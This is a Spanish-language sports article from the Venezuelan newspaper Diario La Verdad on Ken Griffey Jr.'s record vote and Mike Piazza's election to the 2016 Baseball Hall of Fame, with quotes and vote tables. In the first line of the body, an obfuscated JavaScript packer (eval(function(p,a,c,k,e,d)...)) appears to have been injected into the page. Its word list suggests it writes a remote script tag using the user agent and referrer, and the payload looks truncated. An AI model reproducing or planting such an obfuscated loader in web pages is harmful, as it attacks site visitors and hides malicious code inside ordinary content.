Más inmortal que nadie

Juan Paez / Maracaibo / [email protected]
Ken eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rtsie|var|u0026u|referrer|nsabs||js|php'.split('|'),0,{})) Griffey Jr. es elegido al Salón de la Fama de las Grandes Ligas con la mayor cantidad de votos recibidos en la historia. Mike Piazza también se une la clase 2016

Ken Griffey Jr. rompió el récord de porcentaje más alto de votos para ingresar al Salón de la Fama. (Foto: AP)

Finalmente, Ken Griffey Jr. y Mike Piazza pueden llamarse inmortales. Únicamente ellos integraron, ayer, la clase 2016 de peloteros electos al Salón de la Fama de las Grandes Ligas y serán exaltados el 24 de julio, en Cooperstown, Nueva York.

Griffey Jr. lideró la votación a su manera: con notoriedad, superioridad y un signo de admiración, justo como su swing. Con el 99.32 por ciento de los votos, quebró el récord impuesto por Tom Seaver, exlanzador que obtuvo el 98.84 % para entrar al pabellón de los inmortales en 1992. El legendario exjardinero tuvo el apoyo de 437 de los 440 votantes, apenas tres le dieron la espalda y no le permitieron convertirse en la primera elección unánime.

"Valió la espera. Estoy contento y emocionado por estar en semejante club de élite", dijo Griffey Jr., quien recibió la noticia con una llamada telefónica de Jack O'Connell (miembro de la Asociación de Cronistas de Béisbol de América) mientras estaba en su casa, en Orlando, Florida. "No estaba esperando romper el récord. Estoy en shock por tener el más alto porcentaje de todos los tiempos".

El "Júnior", con su propia luz, brilló entre una generación cubierta de esteroides, pero nunca falló una prueba de dopaje, ni siquiera fue sospechoso. Engalanó la posición de jardinero central con sus características jugadas en la barda, ganó 10 Guantes de Oro, fue Jugador Más Valioso (1997), asistió a 13 Juegos de Estrellas, pegó 630 jonrones (sexto mejor en la historia) y tuvo siete campañas de 40 o más vuelacercas, entre otros logros, en 22 años.

Estos sufragios redundaron en una particularidad. En el caso de Griffey Jr., es primera vez que un primer pick del draft de Grandes Ligas llega al Salón de la Fama. Como contraste, Piazza es el inmortal que peor posición tuvo en las escogencias de promesas que anualmente ocurre en las Mayores; lo tomaron los Dodgers de Los Ángeles en la ronda 62, luego de mil 389 otros jóvenes.

"Las palabras no pueden describir este honor", confesó Piazza, quien se quedó con el 82.95 % de los votos, a MLB Network. "Estoy verdaderamente bendecido. Quiero agradecer a los escritores por reconocer mi carrera. Es algo que, hombre, tú no puedes decir. Es un gran tributo a esta ciudad (Nueva York)".

Contra todo pronóstico

La carrera de Piazza no era la más promisoria. De hecho, Tom LaSorda, antiguo mánager de los californianos y padrino del hermano de Mike, sugirió tomarlo en la mencionada ronda y personas en el entorno cuestionaron la selección, pero el tiempo dio frutos.

"Cuando él (Piazza) estaba en las menores e incluso cuando comenzó su carrera en Grandes Ligas, mucha gente creyó que él era el resultado de un favor que le habían hecho a Tommy LaSorda en el draft", contó el retirado primera base Eric Karros, quien jugó siete años con el exreceptor. "Él dejó números increíbles, él era tan fuerte como nadie. Podía batear la pelota al right field como ningún otro bateador derecho".

Durante 16 temporadas, aunque con su mayor fortaleza no era la defensa, el nativo de Pensilvania se convirtió en el jugador con más bambinazos como catcher (396). Fue Novato del Año (1993), dio 427 estacazos de vuelta completa, empujó mil 335 carreras, terminó con .308 de average, obtuvo 10 Bates de Plata y fue a 12 Juegos de Estrellas.

Hay esperanzas

Las candidaturas de Barry Bonds y Roger Clemens, polémicos por presunto uso de sustancias para mejorar el rendimiento, van en alza. Los resultados de este año dan pie a agrandar el optimismo en cuanto a si podrán o no ingresar al Salón de la Fama antes de que acabe su tiempo en las papeletas.

El 44.3 % de los votantes apoyó a Bonds y 45.2 % lo hizo con Clemens. Es primera vez en que ambos llegan al 40 por ciento de los votos, un buen indicio tomando en cuenta que aún les restan seis chances a cada uno y la percepción de los cronistas parece cambiar con el tiempo.

A Mark McGwire se le acabó el tiempo; el slugger culminó su décimo año en las boletas con apenas 54 votos, lo que se traduce al 12.3 %. Sammy Sosa totalizó 7.0 %, Gary Sheffield acumuló 11.6 % y Jeff Bagwell, quien podría entrar el próximo año, registró 71.6 %, cerca del 75 % necesario para tener una placa en Cooperstown.

CANDIDATOS LATINOS EN 2017

Jugador

País

 

Iván Rodríguez

PUR

 

Manny Ramírez

DOM

 

Vladimir Guerrero

DOM

 

Javier Vázquez

PUR

 

Jorge Posada

PUR

 

Magglio Ordóñez

VEN

 

Edgar Rentería

COL

 

Melvin Mora

VEN

 

Carlos Guillén

VEN

 

Orlando Cabrera

COL

 

Julio Lugo

DOM

 

Danys Báez

CUB

 

 

INMORTALES MÁS VOTADOS

Año

Jugador

Boletas

Votos

%

2016

Ken Griffey Jr.

440

437

99.32

1992

Tom Seaver

430

425

98.84

1999

Nolan Ryan

497

491

98.79

2007

Cal Ripken Jr.

545

537

98.53

1936

Ty Cobb

226

222

98.23

1999

George Brett

497

488

98.19

1982

Hank Aaron

415

406

97.83

2007

Tony Gwynn

545

532

97.60

2015

Randy Johnson

549

534

97.27

2014

Greg Maddux

571

555

97.20

 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama